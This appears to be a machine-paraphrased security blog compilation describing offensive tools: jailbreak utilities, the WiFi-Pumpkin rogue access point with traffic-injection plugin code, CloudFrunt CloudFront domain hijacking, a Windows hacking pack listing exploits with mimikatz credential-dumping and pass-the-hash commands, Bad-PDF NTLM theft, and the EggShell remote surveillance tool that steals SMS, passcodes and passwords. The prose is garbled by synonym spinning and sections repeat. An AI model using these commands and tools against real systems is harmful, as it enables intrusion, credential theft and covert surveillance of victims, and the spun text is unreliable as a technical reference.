Evasi0n Jailbreaking Tools For Apple iOS 7.x & 6.x Users

Evasi0n Jailbreaking apparatuses accessible for Apple iOS 7 clients. This jailbreak utility/tool made by Evad3rs group following 3 months of iOS 7 released. evasi0n is accessible for Mac and Windows, and is untethered. Here are the necessities posted on the evasi0n site:

  • A PC, running Windows (XP least), Mac OS X (10.6 least) or Linux (x86/x86_64)
  • iTunes installed in case you’re running Windows
  • An iPhone, iPad or iPod running iOS 7.0 through 7.0.4 (you may check in Settings/General/About => Version)
  • A USB cable to connect the gadget to the PC.

evasi0n7 is an untethered jailbreak which bolsters iOS 7, iOS 7.0.1, iOS 7.0.2, iOS 7.0.3, iOS 7.0.4. It is perfect with the accompanying iOS 7.x.x gadgets:

  • iPhone 5s, iPhone 5c, iPhone 5, iPhone 4S, iPhone 4, iPhone 3GS
  • iPad Air, iPad 4, iPad 3, iPad 2
  • Retina iPad mini, iPad mini
  • iPod touch 5G

Also Read WiFi-Pumpkin – Framework for Rogue Wi-Fi Access Point Attack

Evasi0n Version 6 Jailbreaking by Evad3rs for iOS 6.x

evasi0n 1.5.3 is an untethered jailbreak for all iPhone, iPod touch, iPad and iPad mini than expected models running iOS 6.0 through 6.1

SYSTEM REQUIREMENTS:

  • MacOSX 10.5/10.6/10.7/10.8
  • Windows (XP minimum)
  • Linux x86/x86_64 (Kernel >= 2.6.24, libgtk+-2.0 >= 2.24.13)

SUPPORTED FIRMWARES:

  • iOS 6.0, 6.0.1, 6.0.2, 6.1, 6.1.1, and 6.1.2.

INSTRUCTIONS:

  1. Backup your gadget utilizing iTunes (or iCloud) before utilizing evasi0n. In the case of something breaks, you’ll generally have the capacity to recover your information.
  2. Those who utilize backup passwords in iTunes must disable them for the time being. In the wake of doing as such, iTunes makes a spic and span backup. If you don’t mind sit tight for that backup to finish before continuing! Don’t hesitate to re-enable your backup password in the wake of jailbreaking.
  3. Please disable the lock password of your iOS device before utilizing evasi0n. It can cause issues.
  4. Launch evasi0n, connect to your gadget, and snap “jailbreak”. Simply kick back and watch its progress. Look for any means you might be requested to perform.
  5. Avoid all iOS and iTunes related task until the point that evasi0n is finished. For what reason not simply appreciate a short break from the PC to extend your legs?
  6. If the procedure stalls out some place, it’s sheltered to restart the program, reboot the gadget (if essential by holding down Power and Home until the point that it close down), and rerun the procedure.

FAQ:

If you have any questions regarding the jailbreak process or jailbreaking in general please go to the Jailbreak QA dedicated website: http://www.jailbreakqa.com or see their help page for evasi0n: http://www.jailbreakqa.com/pages/evasi0n-help

CREDITS:

evasi0n is a production of @evad3rs. http://evad3rs.com

WiFi-Pumpkin – Framework for Rogue Wi-Fi Access Point Attack

WiFi-Pumpkin is an extremely total system for evaluating Wi-Fi security. The fundamental feature is the capacity to make a phony AP and make Man In The Middle attack, however the rundown of highlights is very expansive.

Also Read Androl4b – Android Security Virtual Machine

Installation WiFi-Pumpkin

  • Python 2.7
 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 ./installer.sh --install

or download .deb file to install

sudo dpkg -i wifi-pumpkin-0.8.5-all.deb
sudo apt-get -f install # force install dependencies if not install normally

Features WiFi-Pumpkin

  • Rogue Wi-Fi Access Point
  • Deauth Attack Clients AP
  • Probe Request Monitor
  • DHCP Starvation Attack
  • Credentials Monitor
  • Transparent Proxy
  • Windows Update Attack
  • Phishing Manager
  • Partial Bypass HSTS protocol
  • Support beef hook
  • ARP Poison
  • DNS Spoof
  • Patch Binaries via MITM
  • Karma Attacks (support hostapd-mana)
  • LLMNR, NBT-NS and MDNS poisoner (Responder)
  • Pumpkin-Proxy (ProxyServer (mitmproxy API))
  • Capture images on the fly
  • TCP-Proxy (with scapy)

Plugins

Plugin Description
Dns2proxy This tools offer a different features for post-explotation once you change the DNS server to a Victim.
Sstrip2 Sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks based version fork @LeonardoNve/@xtr4nge.
Sergio_proxy Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel.
Responder Responder an LLMNR, NBT-NS and MDNS poisoner. Author: Laurent Gaffie

Transparent Proxy

Transparent proxies(mitmproxy) that you can use to block and control HTTP traffic altering solicitations and responses, that permit to infuse javascripts into the objectives went by. You can without much of a stretch actualize a module to infuse information into pages making a python document in catalog “modules/expansion/” naturally will be recorded on Pumpkin-Proxy tab.

Plugins Example Dev

from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
   meta = {
       'Name'      : 'Nameplugin',
       'Version'   : '1.0',
       'Description' : 'Brief description of the new plugin',
       'Author'    : 'by dev'
   }
   def __init__(self):
       for key,value in self.meta.items():
           self.__dict__[key] = value
       # if you want set arguments check refer wiki more info. 
       self.ConfigParser = False # No require arguments 

   def request(self, flow):
       print flow.__dict__
       print flow.request.__dict__ 
       print flow.request.headers.__dict__ # request headers
       host = flow.request.pretty_host # get domain on the fly requests 
       versionH = flow.request.http_version # get http version 
       
       # get redirect domains example
       # pretty_host takes the "Host" header of the request into account,
       if flow.request.pretty_host == "example.org":
           flow.request.host = "mitmproxy.org"
           
       # get all request Header example 
       self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
       for name, valur in flow.request.headers.iteritems():
           self.send_output.emit('{}: {}'.format(name,valur))
           
       print flow.request.method # show method request 
       # the model printer data
       self.send_output.emit('[NamePlugin]:: this is model for save data logging')

   def response(self, flow):
       print flow.__dict__
       print flow.response.__dict__
       print flow.response.headers.__dict__ #convert headers for python dict
       print flow.response.headers['Content-Type'] # get content type
        
       #every HTTP response before it is returned to the client
       with decoded(flow.response):
           print flow.response.content # content html
           flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag 
      
       del flow.response.headers["X-XSS-Protection"] # remove protection Header
       
       flow.response.headers["newheader"] = "foo" # adds a new header
       #and the new header will be added to all responses passing through the proxy

 TCP-Proxy Server

An proxy that you can put between in a TCP stream. It channels the demand and reaction streams with (scapy module) and effectively adjust parcels of a TCP convention that gets blocked by WiFi-Pumpkin. this module utilizes modules to see or adjust the blocked information that potentially least demanding execution of a module, simply include your custom module “modules/analyzers/” consequently will be recorded on TCP-Proxy tab.

from scapy.all import *
from scapy_http import http # for layer HTTP
from default import PSniffer # base plugin class

class ExamplePlugin(PSniffer):
    _activated     = False
    _instance      = None
    meta = {
        'Name'      : 'Example',
        'Version'   : '1.0',
        'Description' : 'Brief description of the new plugin',
        'Author'    : 'your name',
    }
    def __init__(self):
        for key,value in self.meta.items():
            self.__dict__[key] = value

    @staticmethod
    def getInstance():
        if ExamplePlugin._instance is None:
            ExamplePlugin._instance = ExamplePlugin()
        return ExamplePlugin._instance

    def filterPackets(self,pkt): # (pkt) object in order to modify the data on the fly
        if pkt.haslayer(http.HTTPRequest): # filter only http request 
        
            http_layer = pkt.getlayer(http.HTTPRequest) # get http fields as dict type
            ip_layer = pkt.getlayer(IP)# get ip headers fields as dict type
            
            print http_layer.fields['Method'] # show method http request
            # show all item in Header request http
            for item in http_layer.fields['Headers']:
                print('{} : {}'.format(item,http_layer.fields['Headers'][item]))
            
            print ip_layer.fields['src'] # show source ip address 
            print ip_layer.fields['dst'] # show destiny ip address 
            
            print http_layer # show item type dict
            print ip_layer # show item type dict
            
            return self.output.emit({'name_module':'send output to tab TCP-Proxy'})

 

https://github.com/h2non/toxy

Androl4b – Android Security Virtual Machine

AndroL4b is an android security virtual machine in view of ubuntu-mate incorporates the gathering of most recent framework, tutorials and labs from various security nerds and researchers for reverse engineering and malware analysis.

Changes in Androl4b v.3?

  • Tools are updated
  • New tools and lab added
  • Upgraded to Ubuntu mate 17.04
  • Some cleanup

Also Read Onion nmap To Scan Hidden Onion Services

Example

Androl4b

Tools

  • Radare2 Unix-like reverse engineering framework and commandline tools.
  • Frida Inject JavaScript to explore native apps on Windows, macOS, Linux, iOS, Android, and QNX.
  • ByteCodeViewer Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger).
  • Mobile Security Framework (MobSF) (Android/iOS) Automated Pentesting Framework (Just Static Analysis in this VM).
  • Drozer Security Assessment Framework for Android Applications.
  • APKtool Reverse Engineering Android Apks.
  • AndroidStudio IDE For Android Application Development.
  • BurpSuite Assessing Application Security.
  • Wireshark Network Protocol Analyzer.
  • MARA Mobile Application Reverse engineering and Analysis Framework.
  • FindBugs-IDEA Static byte code analysis to look for bugs in Java code.
  • AndroBugs Framework Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications.
  • Qark Tool to look for several security related Android application vulnerabilities.

CloudFrunt Tool For Identifying Misconfigured CloudFront Domains

CloudFrunt is a tool for identifying misconfigured CloudFront domains. CloudFront is a Content Delivery Network (CDN) gave by Amazon Web Services (AWS). CloudFront clients make “distributions” that serve content from particular sources (an S3 container, for instance).

Each CloudFront distribution has a remarkable endpoint for clients to point their DNS records to (ex. d111111abcdef8.cloudfront.net). The greater part of the areas utilizing a particular distribution should be recorded in the “Alternate Domain Names (CNAMEs)” field in the choices for that distribution.

At the point when a CloudFront endpoint gets a demand, it doesn’t consequently serve content from the relating distribution. Rather, CloudFront utilizes the HOST header of the demand to figure out which distribution to utilize. This implies two things:

  • In the event that the HOST header does not coordinate a entry in the “Alternate Domain Names (CNAMEs)” field of the proposed circulation, the demand will come up short.
  • Whatever other distribution that contains the particular area in the HOST header will get the demand and react to it regularly.

Also Read Best SQL Injection Tools

This is the thing that enables the spaces to be hijacked. There are numerous situations where a CloudFront client neglects to list all the essential areas that may be gotten in the HOST header. For instance:

  • The domain “test.disloops.com” is a CNAME record that focuses to “disloops.com”.
  • The “disloops.com” area is set up to utilize a CloudFront distribution.
  • Since “test.disloops.com” was not added to the “Alternate Domain Names (CNAMEs)” field for the distribution, solicitations to “test.disloops.com” will fall fail.
  • Another client can make a CloudFront distribution and include “test.disloops.com” to the “Alternate Domain Names (CNAMEs)” field to hijack the domain.

This implies the remarkable endpoint that CloudFront binds to a solitary circulation is viably good for nothing. An ask for to one particular CloudFront subdomain isn’t restricted to the distribution it is related with.

Installation CloudFrunt

$ git clone --recursive https://github.com/MindPointGroup/cloudfrunt
$ pip install -r requirements.txt

CloudFrunt expects the dnsrecon script to be cloned into a subdirectory called dnsrecon.

Usage

cloudfrunt.py [-h] [-l TARGET_FILE] [-d DOMAINS] [-o ORIGIN] [-i ORIGIN_ID] [-s] [-N]

-h, --help                      Show this message and exit
-s, --save                      Save the results to results.txt
-N, --no-dns                    Do not use dnsrecon to expand scope
-l, --target-file TARGET_FILE   File containing a list of domains (one per line)
-d, --domains DOMAINS           Comma-separated list of domains to scan
-o, --origin ORIGIN             Add vulnerable domains to new distributions with this origin
-i, --origin-id ORIGIN_ID       The origin ID to use with new distributions

Example

$ python cloudfrunt.py -o cloudfrunt.com.s3-website-us-east-1.amazonaws.com -i S3-cloudfrunt -l list.txt

 CloudFrunt v1.0.4

 [+] Enumerating DNS entries for google.com
 [-] No issues found for google.com

 [+] Enumerating DNS entries for disloops.com
 [+] Found CloudFront domain --> cdn.disloops.com
 [+] Found CloudFront domain --> test.disloops.com
 [-] Potentially misconfigured CloudFront domains:
 [#] --> test.disloops.com
 [+] Created new CloudFront distribution EXBC12DE3F45G
 [+] Added test.disloops.com to CloudFront distribution EXBC12DE3F45G

 

Microsoft Windows Hacking Pack – WHP

Tools here for Windows Hacking Pack are from different sources. The repo is generally licensed with WTFPL, but some content may be not (eg. sysinternals). “pes” means “PE Scambled”. It’s useful sometimes.

Remote Exploits For Windows Hacking Pack
=========================================

Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp


Windows XP/NT (beofre SP2)
MS03-026  Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit


Windows XP (SP2 and SP3) (can be used also for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit (srvscv)
https://www.exploit-db.com/exploits/7104/


Windows Windows 7 and Server 2008 R2 (x64) All Service Packs
MS17-010 aka "Eternal Blue"
https://github.com/RiskSense-Ops/MS17-010


Windows Server 2016 (DoS, may lead to exec)
"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8

Privilege Escalation
======================

First, if you have meterpreter, it may be a good idea to try "getsystem".


srvcheck3.exe
================
Privilege escalation for Windows XP SP2 and before
This can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"


KiTrap0D.tar
=============
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/


Other ways of exploits listed
==============================
Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/


Windows Vista/7 
CVE: 2010-4398  Elevation of Privileges (UAC Bypass) 
http://www.securityfocus.com/bid/45045/exploit


Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/


Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/


Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/


Windows 10 (and before)
Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM

Windows XP SP2 (and before)
srvcheck3.exe - upnp service or SSDPSRV service 


Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/


Windows Vista/7 
CVE: 2010-4398  Elevation of Privileges (UAC Bypass) 
http://www.securityfocus.com/bid/45045/exploit


Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/


Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/


Windows NT/2K/XP/2K3/Vista/2K8/7/8
KiTrap0D - EPATHOBJ Local Ring Exploit
https://www.exploit-db.com/exploits/11199/


Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/


Windows XP (and after)
.lnk exploit for receiving NetNTLM hashes remotely.
https://www.youtube.com/watch?v=cuF_Ibo-mmM


Backup files if contain sam
Windows/system32/config/SAM
/WINDOWS/repair/SAM
regedit.exe HKEY_LOCAL_MACHINE -> SAM

Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel
Otherwise just copy.


Dump SAM through shadow volume
If it can be created the database could be copied from this.
Vista command: vssadmin create shadow
Server 2008 command: diskshadow


Windows Credentials Editor
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions). 


Mimikatz dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam


Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials
fgdump.exe (contains pwdump and cachedump, can read from memory)


SAM dump (hive)
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."


Dump SAM, then spray hashes
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/


LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip


PassTheHash (before Windows 8.1)
pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmd


PassTheTicket (Kerberos)
mimikatz can do it


Duplicate Access Tokens (if admin access token can be used, it's win)
http://sourceforge.net/projects/incognito/


Token "Kidnapping"
MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority)
http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html


Other notablelo tools
psexec, smbshell, metasploit’s psexec, etc
https://github.com/BloodHoundAD/BloodHound - It allows to visualize connections in an AD domain and find fast escalation ways.



To Be Added
==============
- http://www.nirsoft.net/ --> Stuff for dumping passwords
- openvpn
- evilgrade



Hashes (SHA256) and VirusTotal scans
=====================================

8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333  AwesomerShell.tar
7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051  KiTrap0D.tar
96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389  LICENSE.txt
b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e  ncat.exe
da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b  ncat_pes.exe
be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b  nc.exe
56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7  nmap-7.12-setup-gui.exe
0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5  nmap-7.12-win32_commandline.zip
976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654  plink.exe
952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f  srvcheck3.exe
ca5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170  PEScrambler.exe
ef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9  SysinternalsSuite.zip
8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336  windows-privesc-check.exe
6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd  windows-privesc-check.py
ffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9  fgdump.exe
c36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a  kaht2.zip
2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d  mimikatz_2-1.zip
0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a  ms08-067_exploit_31874.py
cc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827  ms08-067_exploit_7132.py
950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e  Responder.tar
54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448  samdump2.exe
ece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8  wce_getlsasrvaddr.exe
c6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7  wce_v1_41beta_universal.exe
ecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6  wce_v1_42beta_x32.exe

5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976  sources/nc110.tgz
47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9  sources/rdp2tcp-0.1.tar.gz
33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78  sources/srvcheck3.zip
f706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56  sources/3proxy-0.8.6.tar.gz
7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc  sources/3proxy-0.9-devel.tgz
dec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81  sources/fgdump-2.1.0.tar.bz2
352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca  sources/impacket_0-9-15.tar
21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4  sources/keimpx-0.3-dev.tar
16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd  sources/mimikatz-2016-06.zip
602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526  sources/samdump2-3.0.0.tar.bz2


ncat.exe
SHA256: b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e
https://virustotal.com/en/file/b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e/analysis/1466258994/

ncat_pes.exe
SHA256: da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b 
https://virustotal.com/en/file/da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b/analysis/1466259528/

nc110.tgz
SHA256: 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976
https://virustotal.com/en/file/5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976/analysis/1466258410/

rdp2tcp-0.1.tar.gz
SHA256: 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9
https://virustotal.com/en/file/47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9/analysis/1466271163/

Also Read Bad-PDF To Steal NTLM Hashes From Windows Machines

Bad-PDF To Steal NTLM Hashes From Windows Machines

Bad-PDF make pernicious PDF to steal NTLM Hashes from windows machines, it use defenselessness revealed by checkpoint group to make the malicious PDF record. Bad-Pdf peruses the NTLM hashes utilizing Responder listener.

This strategy deal with all PDF readers(Any version) and java scripts are not required for this attack.

Reference : https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/

Also Read EggShell – Remote Administration Tool For iOS/macOS

Dependency To Steal NTLM Hashes

Responder/Kali Linux

Usage: python badpdf.py

Run Bad-PDF in Kali linux:

Responder waiting for NTLM hash:

Run generated Bad-PDF file on a windows machine and get NTLM hash:

Author : Deepu

EggShell – Remote Administration Tool For iOS/macOS

EggShell is a post misuse surveillance instrument written in Python. It gives you a command line session with additional usefulness amongst you and an objective machine. EggShell gives you the power and convenience of uploading/downloading records, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is venture is a proof of concept, expected for use on machines you claim.

 

For detailed information and how-to visit please access the link.

Also Read Drozer – Android Leading Security Testing Framework

Getting Started With Eggshell

  • Requires python 2.7

macOS/Linux Installation

git clone https://github.com/neoneggplant/eggshell
cd eggshell
python eggshell.py

iOS (Jailbroken)

Add Cydia source: http://lucasjackson.io/repo Install EggShell 3 Use any mobile terminal application and run the command eggshell

Creating Payloads

Eggshell payloads are executed on the target machine. The payload first sends over instructions for getting and sending back device details to our server and then chooses the appropriate executable to establish a secure remote control session.

bash

Selecting bash from the payload menu will give us a 1 liner that establishes an eggshell session upon execution on the target machine

teensy macOS (USB injection)

Teensy is a USB development board that can be programmed with the Arduino ide. It emulates usb keyboard strokes extremely fast and can inject the EggShell payload just in a few seconds.

Selecting teensy will give us an arduino based payload for the teensy board.

After uploading to the teensy, we can use the device to plug into a macOS usb port. Once connected to a computer, it will automatically emulate the keystrokes needed to execute a payload.

Interacting with a session

After a session is established, we can execute commands on that device through the EggShell command line interface. We can show all the available commands by typing “help”

Tab Completion

Similar to most command line interfaces, EggShell supports tab completion. When you start typing the path to a directory or filename, we can complete the rest of the path using the tab key.

Multihandler

The Multihandler option lets us handle multiple sessions. We can choose to interact with different devices while listening for new connections in the background.

Similar to the session interface, we can type “help” to show Multihandler commands

Commands

macOS

  • brightness : adjust screen brightness
  • cd : change directory
  • download : download file
  • getfacebook : retrieve facebook session cookies
  • getpaste : get pasteboard contents
  • getvol : get speaker output volume
  • idletime : get the amount of time since the keyboard/cursor were touched
  • imessage : send message through the messages app
  • itunes : iTunes Controller
  • keyboard : your keyboard -> is target’s keyboard
  • lazagne : firefox password retrieval | (https://github.com/AlessandroZ/LaZagne/wiki)
  • ls : list contents of a directory
  • mic : record mic
  • persistence : attempts to re establish connection after close
  • picture : take picture through iSight
  • pid : get process id
  • prompt : prompt user to type password
  • screenshot : take screenshot
  • setvol : set output volume
  • sleep : put device into sleep mode
  • su : su login
  • suspend : suspend current session (goes back to login screen)
  • upload : upload file

iOS

  • alert : make alert show up on device
  • battery : get battery level
  • bundleids : list bundle identifiers
  • cd : change directory
  • dhome : simulate a double home button press
  • dial : dial a phone number
  • download : download file
  • getcontacts : download addressbook
  • getnotes : download notes
  • getpasscode : retreive the device passcode
  • getsms : download SMS
  • getvol : get volume level
  • home : simulate a home button press
  • installpro : install substrate commands
  • ipod : control music player
  • islocked : check if the device is locked
  • lastapp : get last opened application
  • locate : get device location coordinates
  • locationservice: toggle location services
  • lock : simulate a lock button press
  • ls : list contents of a directory
  • mic : record mic
  • mute : update and view mute status
  • open : open apps
  • openurl : open url on device
  • persistence : attempts to re establish connection after close
  • picture : take picture through iSight
  • pid : get process id
  • respring : restart springboard
  • safemode : put device into safe mode
  • say : text to speach
  • setvol : set device volume
  • sysinfo : view system information
  • upload : upload file
  • vibrate : vibrate device

Linux

  • cd : change directory
  • download : download file
  • ls : list contents of a directory
  • pid : get process id
  • pwd : show current directory
  • upload : upload file

Drozer – Android Leading Security Testing Framework

Drozer (once in the past Mercury) is the main security testing framework for Android.

It enables you to scan for security vulnerabilities in applications and devices by expecting the part of an application and cooperating with the Dalvik VM, other applications’ IPC endpoints and the basic OS.

It gives apparatuses to enable you to utilize, share and comprehend open Android abuses. It causes you to send a Agent to a device through abuse or social engineering. Utilizing weasel (MWR’s propelled abuse payload) it can amplify the authorizations accessible to it by introducing a full operator, infusing a constrained specialist into a running procedure, or associating a turn around shell to go about as a Remote Access Tool (RAT).

Requirement For Drozer

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

Also Read AutoNSE – Massive NSE AutoSploit and AutoScanner

Command Reference

Command

Description
run Executes a drozer module
list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean Remove temporary files stored by drozer on the Android device.
contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo Print text to the console.
exit Terminate the drozer session.
help Display help about a particular command or module.
load Load a file containing drozer commands, and execute them in sequence.
module Find and install additional drozer modules from the Internet.
permissions Display a list of the permissions granted to the drozer Agent.
set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by it.
unset Remove a named variable that it passes to any Linux shells that it spawns.

Installing

Installing the Agent

It can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent by clicking here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, it uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server 192.168.0.10

On Windows:

> drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

AutoNSE – Massive NSE AutoSploit and AutoScanner

Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmap’s most capable and adaptable features. It enables clients to compose (and share) basic scripts (utilizing the Lua programming dialect ) to computerize a wide variety of networking tasks. Those contents are executed in parallel with the speed and effectiveness you anticipate from Nmap. Clients can depend on the developing and diverse arrangement of scripts appropriated with Nmap, or write their own to address custom issues.

AutoSploit and AutoScanner

For more information’s Click Here.

Installation AutoSploit and AutoScanner

$ git clone https://github.com/m4ll0k/AutoNSE.git
$ cd AutoNSE 
$ bash autonse.sh

Also Read WiFi-Pumpkin – Framework for Rogue Wi-Fi Access Point Attack

Examples

$ bash autonse.sh

WiFi-Pumpkin – Framework for Rogue Wi-Fi Access Point Attack

WiFi-Pumpkin is a complete framework for auditing Wi-Fi security. The main feature is the ability to create a fake AP and make Man In The Middle attack, but the list of features is quite broad.

Installation – WiFi-Pumpkin

Python 2.7
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
./installer.sh --install

Features

  • Rogue Wi-Fi Access Point.
  • Deauth Attack Clients AP.
  • Probe Request Monitor.
  • DHCP Starvation Attack.
  • Credentials Monitor.
  • Transparent Proxy.
  • Windows Update Attack.
  • Phishing Manager.
  • Partial Bypass HSTS protocol.
  • Support beef hook.
  • ARP PoisonDNS Spoof.
  • Patch Binaries via MITM.
  • Karma Attacks (support hostapd-mana).
  • LLMNR, NBT-NS and MDNS poisoner (Responder).
  • Pumpkin-Proxy (ProxyServer (mitmproxy API)).
  • Capture images on the fly.
  • TCP-Proxy (with scapy)

WiFi-Pumpkin

Tools Plugin

Plugin Description
